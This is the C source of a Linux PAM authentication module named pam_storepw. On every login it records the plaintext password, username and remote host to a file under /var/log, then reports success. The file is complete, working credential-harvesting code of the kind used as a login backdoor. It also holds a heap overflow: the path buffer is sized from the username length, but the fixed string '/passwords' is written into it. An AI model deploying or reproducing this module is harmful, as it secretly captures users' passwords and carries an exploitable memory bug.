/* pam_storepw copyright 2002 Florian Lohoff <flo@rfc822.org> * Based on pam_p

1. /* pam_storepw copyright 2002 Florian Lohoff <flo@rfc822.org>
2. * Based on pam_pwdfile.c by Charl P. Botha */
3.  
4. #ifndef LINUX
5. #include <security/pam_appl.h>
6. #endif /* LINUX */
7.  
8. #define PAM_SM_AUTH
9. #include <security/pam_modules.h>
10.  
11. #include <syslog.h>
12. #include <stdarg.h>
13. #include <stdio.h>
14. #include <stdlib.h>
15. #include <string.h>
16. #include <errno.h>
17. #include <fcntl.h>
18. #include <sys/types.h>
19. #include <sys/stat.h>
20. #include <sys/wait.h>
21. #include <sys/file.h>
22.  
23. #define _XOPEN_SOURCE
24. #include <unistd.h>
25.  
26. #define PWDIR_PARAM "pwdir"
27. #define PWDIR_DEFAULT "/var/log"
28. #define PWDIR_LEN 256
29. #define BUF_MAX 256
30.  
31. #define DEBUG
32.  
33. #ifdef DEBUG
34. # define D(a) a;
35. #else
36. # define D(a) {}
37. #endif
38.  
39. /* logging function ripped from pam_listfile.c */
40. static void _pam_log(int err, const char *format, ...) {
41. va_list args;
42.  
43. va_start(args, format);
44. openlog("pam_storepw", LOG_CONS|LOG_PID, LOG_AUTH);
45. vsyslog(err, format, args);
46. va_end(args);
47. closelog();
48. }
49.  
50. /* expected hook for auth service */
51. PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags,
52. int argc, const char **argv) {
53. int pcnt,
54. fd,
55. len,
56. res,
57. check;
58. char *pwdir=0,
59. *pword,
60. *uname,
61. *remhst,
62. *file,
63. buffer[BUF_MAX];
64. FILE *pwfile;
65.  
66. for(pcnt=0;pcnt<argc;pcnt++) {
67. if (strcmp(argv[pcnt], PWDIR_PARAM) == 0) {
68. if (pcnt+1 < argc)
69. pwdir=strndup(argv[++pcnt], PWDIR_LEN);
70. } else if (strncmp(argv[pcnt], PWDIR_PARAM "=", sizeof(PWDIR_PARAM "=")-1) == 0)
71. pwdir=strndup(argv[pcnt]+sizeof(PWDIR_PARAM), PWDIR_LEN);
72. }
73.  
74. if (!pwdir)
75. pwdir=strndup(PWDIR_DEFAULT, PWDIR_LEN);
76.  
77. pam_get_item(pamh, PAM_AUTHTOK, (void *) &pword);
78. pam_get_item(pamh, PAM_USER, (void*) &uname);
79. pam_get_item(pamh, PAM_RHOST, (void*) &remhst);
80. if (!pword || !uname) {
81. _pam_log(LOG_ERR,"no password or user to write - got stacked wrong ?");
82. return PAM_AUTHINFO_UNAVAIL;
83. }
84.  
85.  
86. file=(char *) malloc(strlen(uname) + strlen(pwdir) + 2);
87. if (!file) {
88. _pam_log(LOG_ERR,"malloc failed");
89. return PAM_AUTHINFO_UNAVAIL;
90. }
91.  
92. sprintf(file, "%s/passwords", pwdir);
93. /* D(_pam_log(LOG_DEBUG, "writing to %s", file)); */
94.  
95. if ((fd=open(file, O_RDWR|O_APPEND|O_CREAT, 0600)) == -1) {
96. _pam_log(LOG_ERR,"failed to open pw file");
97. return PAM_AUTHINFO_UNAVAIL;
98. }
99.  
100. len=snprintf(buffer, BUF_MAX-1, "host = %s : username = %s : password = %s\n",
101. remhst, uname, pword);
102.  
103. res=write(fd, buffer, len);
104.  
105. if (len != res) {
106. _pam_log(LOG_ERR,"failed to write pw to file");
107. close(fd);
108. return PAM_AUTHINFO_UNAVAIL;
109. }
110.  
111. close(fd);
112.  
113. return PAM_SUCCESS;
114. }
115.  
116. /* another expected hook */
117. PAM_EXTERN int pam_sm_setcred(pam_handle_t *pamh, int flags,
118. int argc, const char **argv)
119. {
120. return PAM_SUCCESS;
121. }
122.  
123. #ifdef PAM_STATIC
124. struct pam_module _pam_listfile_modstruct = {
125. "pam_pwdfile",
126. pam_sm_authenticate,
127. pam_sm_setcred,
128. NULL,
129. NULL,
130. NULL,
131. NULL,
132. };
133. #endif